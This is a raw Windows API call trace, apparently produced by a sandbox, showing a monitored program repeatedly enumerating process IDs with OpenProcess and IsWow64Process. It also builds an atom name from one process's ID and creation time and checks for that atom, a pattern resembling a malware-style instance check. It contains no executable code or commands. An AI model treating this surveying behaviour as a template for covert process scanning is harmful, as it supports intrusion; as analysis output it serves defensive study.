	[0089.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.911] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.911] CloseHandle (hObject=0x20c) returned 1
	[0089.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.911] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.911] CloseHandle (hObject=0x20c) returned 1
	[0089.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.911] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.911] CloseHandle (hObject=0x20c) returned 1
	[0089.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.912] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.912] CloseHandle (hObject=0x20c) returned 1
	[0089.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.912] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.912] CloseHandle (hObject=0x20c) returned 1
	[0089.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.912] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.912] CloseHandle (hObject=0x20c) returned 1
	[0089.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.912] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.912] CloseHandle (hObject=0x20c) returned 1
	[0089.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.913] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.913] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.913] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.913] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.913] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.913] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.913] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.913] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.913] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.914] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.914] CloseHandle (hObject=0x20c) returned 1
	[0089.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.914] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.914] CloseHandle (hObject=0x20c) returned 1
	[0089.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.991] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.991] CloseHandle (hObject=0x20c) returned 1
	[0089.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.991] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.991] CloseHandle (hObject=0x20c) returned 1
	[0089.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.992] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.992] CloseHandle (hObject=0x20c) returned 1
	[0089.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.992] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.992] CloseHandle (hObject=0x20c) returned 1
	[0089.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.992] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.992] CloseHandle (hObject=0x20c) returned 1
	[0089.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.992] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.992] CloseHandle (hObject=0x20c) returned 1
	[0089.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.992] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.992] CloseHandle (hObject=0x20c) returned 1
	[0089.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.993] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.993] CloseHandle (hObject=0x20c) returned 1
	[0089.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.993] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.993] CloseHandle (hObject=0x20c) returned 1
	[0089.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.993] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.993] CloseHandle (hObject=0x20c) returned 1
	[0089.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.993] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.993] CloseHandle (hObject=0x20c) returned 1
	[0089.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.993] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.994] CloseHandle (hObject=0x20c) returned 1
	[0089.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.994] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.994] CloseHandle (hObject=0x20c) returned 1
	[0089.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.994] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.994] CloseHandle (hObject=0x20c) returned 1
	[0089.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.994] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.994] CloseHandle (hObject=0x20c) returned 1
	[0089.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.994] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.994] CloseHandle (hObject=0x20c) returned 1
	[0089.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.994] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.994] CloseHandle (hObject=0x20c) returned 1
	[0089.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.995] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.995] CloseHandle (hObject=0x20c) returned 1
	[0089.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.995] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.995] CloseHandle (hObject=0x20c) returned 1
	[0089.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.995] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.995] CloseHandle (hObject=0x20c) returned 1
	[0089.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.995] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.995] CloseHandle (hObject=0x20c) returned 1
	[0089.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.995] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.995] CloseHandle (hObject=0x20c) returned 1
	[0089.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.995] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.995] CloseHandle (hObject=0x20c) returned 1
	[0089.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.996] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.996] CloseHandle (hObject=0x20c) returned 1
	[0089.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.996] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.996] CloseHandle (hObject=0x20c) returned 1
	[0089.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.996] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.996] CloseHandle (hObject=0x20c) returned 1
	[0089.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.996] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.996] CloseHandle (hObject=0x20c) returned 1
	[0089.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.996] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.996] CloseHandle (hObject=0x20c) returned 1
	[0089.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.997] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.997] CloseHandle (hObject=0x20c) returned 1
	[0089.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.997] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.997] CloseHandle (hObject=0x20c) returned 1
	[0089.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.997] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.997] CloseHandle (hObject=0x20c) returned 1
	[0089.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.997] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.997] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.031] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.031] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.032] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.032] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.032] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.032] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.032] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.032] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.033] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.033] CloseHandle (hObject=0x20c) returned 1
	[0090.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.033] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.033] CloseHandle (hObject=0x20c) returned 1
	[0090.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.123] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.123] CloseHandle (hObject=0x20c) returned 1
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.124] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.124] CloseHandle (hObject=0x20c) returned 1
	[0090.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.124] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.124] CloseHandle (hObject=0x20c) returned 1
	[0090.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.124] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.124] CloseHandle (hObject=0x20c) returned 1
	[0090.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.124] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.124] CloseHandle (hObject=0x20c) returned 1
	[0090.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.124] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.124] CloseHandle (hObject=0x20c) returned 1
	[0090.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.125] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.125] CloseHandle (hObject=0x20c) returned 1
	[0090.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.125] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.125] CloseHandle (hObject=0x20c) returned 1
	[0090.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.125] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.125] CloseHandle (hObject=0x20c) returned 1
	[0090.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.125] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.125] CloseHandle (hObject=0x20c) returned 1
	[0090.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.125] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.126] CloseHandle (hObject=0x20c) returned 1
	[0090.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.126] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.126] CloseHandle (hObject=0x20c) returned 1
	[0090.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.126] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.126] CloseHandle (hObject=0x20c) returned 1
	[0090.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.126] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.126] CloseHandle (hObject=0x20c) returned 1
	[0090.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.126] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.126] CloseHandle (hObject=0x20c) returned 1
	[0090.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.127] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.127] CloseHandle (hObject=0x20c) returned 1
	[0090.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.127] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.127] CloseHandle (hObject=0x20c) returned 1
	[0090.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.127] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.127] CloseHandle (hObject=0x20c) returned 1
	[0090.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.127] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.127] CloseHandle (hObject=0x20c) returned 1
	[0090.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.127] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.127] CloseHandle (hObject=0x20c) returned 1
	[0090.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.128] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.128] CloseHandle (hObject=0x20c) returned 1
	[0090.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.128] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.128] CloseHandle (hObject=0x20c) returned 1
	[0090.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.128] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.128] CloseHandle (hObject=0x20c) returned 1
	[0090.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.128] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.128] CloseHandle (hObject=0x20c) returned 1
	[0090.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.128] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.128] CloseHandle (hObject=0x20c) returned 1
	[0090.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.129] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.129] CloseHandle (hObject=0x20c) returned 1
	[0090.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.129] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.129] CloseHandle (hObject=0x20c) returned 1
	[0090.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.129] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.129] CloseHandle (hObject=0x20c) returned 1
	[0090.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.129] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.129] CloseHandle (hObject=0x20c) returned 1
	[0090.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.129] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.129] CloseHandle (hObject=0x20c) returned 1
	[0090.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
